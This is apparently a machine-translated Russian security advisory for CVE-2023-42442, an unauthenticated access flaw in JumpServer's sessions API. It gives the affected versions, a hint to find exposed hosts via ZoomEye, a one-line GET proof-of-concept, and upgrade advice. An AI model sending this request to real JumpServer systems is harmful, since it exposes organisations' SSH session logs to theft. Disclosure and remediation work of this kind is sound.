0x01 Введение

Хост-бастион JumpServer с открытым исходным кодом — это продукт системы аудита безопасности эксплуатации и обслуживания, который обеспечивает проверку личности, контроль авторизации, управление учетными записями, аудит безопасности и другую функциональную поддержку, чтобы помочь предприятиям быстро создать возможности аудита безопасности эксплуатации и обслуживания. Бастионная машина JumpServer с открытым исходным кодом предоставляет дополнительные решения по аудиту безопасности эксплуатации и обслуживания с открытым исходным кодом для пользователей корпоративного уровня через корпоративную версию или универсальную программно-аппаратную машину.

0x02 Обзор уязвимостей

Номер уязвимости: CVE-2023-42442.

Эта уязвимость существует в JumpServer и представляет собой уязвимость несанкционированного доступа. Существует логическая ошибка в управлении разрешениями API/api/v1/terminal/sessions/, к которому злоумышленники могут получить анонимный доступ. Удаленный злоумышленник, не прошедший проверку подлинности, может воспользоваться этой уязвимостью для загрузки журналов SSH и удаленной кражи конфиденциальной информации. Сеансы SSH, хранящиеся в S3, OSS или другом облачном хранилище, не затрагиваются.

0x03 Затронутая версия

3.0.0 <= JumpServer <= 3.5.4

3.6.0 <= JumpServer <= 3.6.3

0x04 Настройка среды

Использование поисковой системы ZoomEye в киберпространстве

Приложение для грамматики Zoomeye: «Облачная крепость Фэй Чжи»

0x05 Повторение уязвимости

POC уязвимости:

/api/v1/terminal/sessions/

Пакет запроса конфигурации

Советы: пакет запроса GET должен содержать две пустые строки.

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: 127.0.0.1

0x06 Как это исправить

На данный момент существует официальная обновленная версия, обновите ее до последней версии.

Адрес загрузки: https://www.jumpserver.org/.

Рекомендуемые услуги